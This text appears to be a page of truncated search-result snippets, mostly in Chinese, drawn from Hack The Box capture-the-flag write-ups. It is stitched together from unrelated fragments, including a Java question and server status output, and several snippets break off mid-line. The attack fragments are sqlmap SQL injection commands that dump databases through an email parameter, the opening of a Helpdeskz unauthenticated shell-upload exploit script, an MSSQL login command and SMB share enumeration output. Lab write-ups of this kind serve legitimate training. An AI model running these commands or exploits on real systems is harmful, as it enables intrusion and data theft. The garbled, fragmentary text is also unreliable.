sqlmap -r usage_htb_resetpasswd --level 5 --risk 3 -p email --batch --threads 10 无脑脚本小子是这样的 然后就是 sql 爆库爆字段环节 sqlmap -r usage_htb_resetpasswd --level 5 --risk 3 -p email --batch --dbs --threads 10 sqlmap -r usage_htb_resetpasswd --level 5 --risk 3 -...
sqlmap -r usage_htb_resetpasswd --level 5 --risk 3 -p email --batch --threads 10 无脑脚本小子是这样的 然后就是 sql 爆库爆字段环节 sqlmap -r usage_htb_resetpasswd --level 5 --risk 3 -p email --batch --dbs --threads 10 sqlmap -r usage_htb_resetpasswd --level 5 --risk 3 -...
挨个看,先看文件上传的 importhashlibimportsysimportrequestsimportdatetimefromtqdmimporttqdm# 用于显示进度条fromconcurrent.futuresimportThreadPoolExecutor, as_completedprint('Helpdeskz v1.0.2 - Unauthenticated shell upload exploit')iflen(sys.argv) <3:print("Usage {} [baseUrl] [nameOfUploadedFile]".forma...
利用这两个网站生成公钥和私钥并使用私钥进行签名:https://youritmate.us/pgp/、http://www.2pih.com/pgp.html,在https://youritmate.us/pgp/生成公钥和私钥(需要填写下名字和账户),然后利用私钥在http://www.2pih.com/pgp.html网站对信息进行签名。 在https://ssa.htb/guide利用我们上面获得公钥对签名信...
Usage: cachemgr_passwd password action action ... Ok, but the username? so I try to specify to the authentication for only the password, leaving the username empty and... Silence please and go on! Well, after had launched all the command I found something interesting that I can use. ...
靶机IP:;kali IP:;使用nmap进行端口扫描并保存到ports文件中。 n00b2Hacker 158787围观2025-01-28 HACK THE BOX HTB——Season 5 Week 5 MagicGardens Writeup金币 攻防演练 仅限分享学习。 A1ertx5s 165931围观·1·562024-05-21...
Usage:impacket-mssqlclient -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP># Recommended -windows-auth when you are going to use a domain. Use as domain the netBIOS name of the machine impacket-mssqlclient ARCHETYPE/sql_svc@ -windows-auth ...
Usage of /: 35.1% of 15.68GB Memory usage: 69% Swap usage: 5% Processes: 338 Users logged in: 0 IPv4 address for ens192: IPv4 address for lxdbr0: IPv6 address for lxdbr0: fd42:953:7bee:d1be::1
Retrieving class variables through usage of `.class` Is it possible to access a public variable in a class while if the only available access to that class is its .class. As an example if I have A_VARIABLE in both ClassA and ClassB, if I put the referen... ...
┌──(root💀kali)-[~//]-H10.10.10.134-+]:[-]Work[!]Unabletoremovetest directory at \\\Backups\YCUDSRXTPW,pleaseremovemanuallyDiskPermissionsComment---ADMIN$NOACCESSRemoteAdminBackupsREAD,WRITEC$NOACCESSDefaultshare IPC$READONLYRemoteIPC...